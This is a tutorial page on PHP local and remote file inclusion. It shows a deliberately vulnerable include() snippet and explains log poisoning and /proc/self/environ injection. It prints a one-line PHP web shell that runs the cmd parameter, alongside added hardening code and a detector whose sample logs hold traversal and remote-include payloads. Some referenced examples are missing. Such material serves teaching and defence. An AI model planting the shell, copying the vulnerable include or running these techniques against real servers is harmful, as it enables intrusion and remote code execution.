Secondary Categories: 02-Web Application


Description:

There are two types of file inclusion attacks: local and remote. In a Local File Inclusion (LFI) the attacker is able to retrieve a file that is stored locally on the victim's machine, which is usually a web server hosting a website. In a Remote File Inclusion (RFI) the web server is made to retrieve and include a file from an external location chosen by the attacker.

  • Remote File Inclusion (RFI):

    • A piece of vulnerable code would look something similar to what is seen below.
    <?php
    $file = $_GET['page'];   // The page we wish to display
    include($file . ".php"); // <-- Vulnerable !!
    ?>

    As you can see, the code doesn't perform any sort of check on the content of the ‘page’ parameter, which allows the attacker to include their own file or a PHP reverse shell in the web page. The attacker would exploit this RFI by passing a URL pointing to the PHP reverse shell as the value of the ‘page’ parameter in this example.

  • LFI → RCE

These sorts of vulnerabilities occur in PHP functions where developers don't check the user-supplied data before it is used.

RFI/LFI PHP functions:

  • include()
  • include_once()
  • require()
  • require_once()
  • fopen()
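A hardened replacement for the include() example above, added here as an illustration and not taken from the original page: the request value is used only as a key into a fixed allowlist, so it never reaches include() as a path. The PAGES map, resolvePage() and the pages/ directory are assumptions.

```php
<?php
// Added example (not from the original page): hardened replacement for the
// vulnerable include($_GET['page'] . ".php") pattern. The PAGES map,
// resolvePage() and the pages/ directory are assumptions for illustration.

// Allowlist of every page this front controller may include. The request value
// is only ever used as an array key, never concatenated into a path, so "../",
// "http://..." and stream wrappers such as "php://" can never reach include().
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

/**
 * Resolve a requested page name to an allowlisted file path.
 * Returns null for anything not explicitly listed.
 */
function resolvePage(string $requested): ?string
{
    return PAGES[$requested] ?? null;
}

// $_GET['page'] may be absent or, with ?page[]=x, an array; only accept a string.
$raw       = $_GET['page'] ?? 'home';
$requested = is_string($raw) ? $raw : '';
$path      = resolvePage($requested);

if ($path === null) {
    http_response_code(404);
    // Record the rejected value for detection; hex-encode it so the log itself
    // cannot be poisoned with PHP tags or control characters.
    error_log('Rejected page parameter: ' . bin2hex($requested));
    exit('Page not found');
}

include $path;
```

Pair this with allow_url_include=Off (the PHP default) and an open_basedir restriction in php.ini, so that even a regression in the controller cannot include remote or out-of-tree files. The hex-encoded error_log entry matters for the log-poisoning path discussed below: a rejected value containing PHP tags is stored as hex, not as executable text.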

There are several ways to go from an LFI/RFI to Remote Code Execution (RCE). One of them is poisoning the Apache logs. The access log records the GET and POST requests made to the server, so if the attacker alters the request (for example the URL they request), the log file will reflect that. The attacker can then use the LFI to display the log file containing the poisoned content, as seen below.

Another method to get remote code execution from an LFI is through the process environment. When a user visits a PHP page on the web server, a process is created on the *nix system. Each process has its own entry under /proc/, and /proc/self/ is a static path that is a symbolic link to the entry of the current process, which contains useful information. If some sort of malicious code can be injected into /proc/self/environ, the attacker can run arbitrary commands on the target through the LFI they have found. A /proc/self/environ instance contains the User-Agent of the request. To poison it, the attacker can use a tool like Burp Suite to alter the User-Agent value to the malicious code, something similar to what is shown below. Then, using the LFI, the attacker navigates to that file and uses the cmd parameter to get code execution.

Another way to go from LFI to RCE assumes that the attacker has access to upload a file to the system. If the attacker is able to upload a malicious file containing a simple PHP line like the one seen below, the LFI can be pointed at that file and the cmd parameter used to execute a command on the system.

<?php exec($_GET['cmd']); ?>
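Detection for the three LFI-to-RCE paths above (traversal toward /proc/self/environ or the Apache log, a remote URL in the page parameter, and PHP tags planted in the request or User-Agent), as an added example that is not from the original page: a PHP CLI script that scans Apache combined-format access log lines and reports which indicators fire. The log lines are constructed samples, and the indicator set is a starting point to tune, not the page's own.

```php
<?php
// Added example (not from the original page): scan Apache combined-format access
// log lines for LFI/RFI and log-poisoning indicators. The log lines are
// constructed samples; the indicator patterns are a starting point to tune.

const INDICATORS = [
    // "../" or "..\" after URL-decoding: directory traversal toward /etc, /proc, /var/log
    'traversal'      => '#(\.\./|\.\.\\\\)#',
    // the process environment file that carries the request's User-Agent
    'proc_environ'   => '#/proc/self/environ#i',
    // web server log files, the target of log poisoning
    'log_file_path'  => '#/var/log/(apache2|httpd|nginx)/#i',
    // a parameter whose value is a URL: remote file inclusion attempt
    'remote_include' => '#[?&][^=&]+=https?://#i',
    // PHP open tag in the request line or User-Agent: content planted for later inclusion
    'php_tag'        => '#<\?php#i',
];

/**
 * Parse one combined-format line:
 *   client ident user [time] "request" status bytes "referer" "user-agent"
 * Returns null when the line does not match that layout.
 */
function parseLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['client' => $m[1], 'request' => $m[2], 'status' => (int) $m[3], 'ua' => $m[5]];
}

/**
 * Return the names of the indicators that fire for one log line.
 * The request line is URL-decoded twice so that "%2e%2e%2f" and its
 * double-encoded form are both seen as "../".
 */
function scanLine(string $line): array
{
    $entry = parseLine($line);
    if ($entry === null) {
        return [];
    }
    $decoded  = rawurldecode(rawurldecode($entry['request']));
    $haystack = $decoded . "\n" . $entry['ua'];

    $hits = [];
    foreach (INDICATORS as $name => $pattern) {
        if (preg_match($pattern, $haystack) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample log lines (RFC 5737 documentation addresses).
$sampleLog = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?page=..%2f..%2f..%2fproc%2fself%2fenviron HTTP/1.1" 200 2048 "-" "<?php echo 1; ?>"',
    '203.0.113.8 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 65536 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:55 +0000] "GET /index.php?page=http://example.invalid/x HTTP/1.1" 500 0 "-" "curl/8.0"',
];

foreach ($sampleLog as $line) {
    $hits = scanLine($line);
    if ($hits !== []) {
        $entry = parseLine($line);
        printf("%-12s %-70s -> %s\n", $entry['client'], $entry['request'], implode(', ', $hits));
    }
}
```

The first sample line produces no hits; the others fire traversal, proc_environ plus php_tag, traversal plus log_file_path, and remote_include respectively. Because the User-Agent is part of the haystack, a PHP tag planted for the /proc/self/environ or log-poisoning technique is flagged at the moment it is written, before any later inclusion request arrives.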
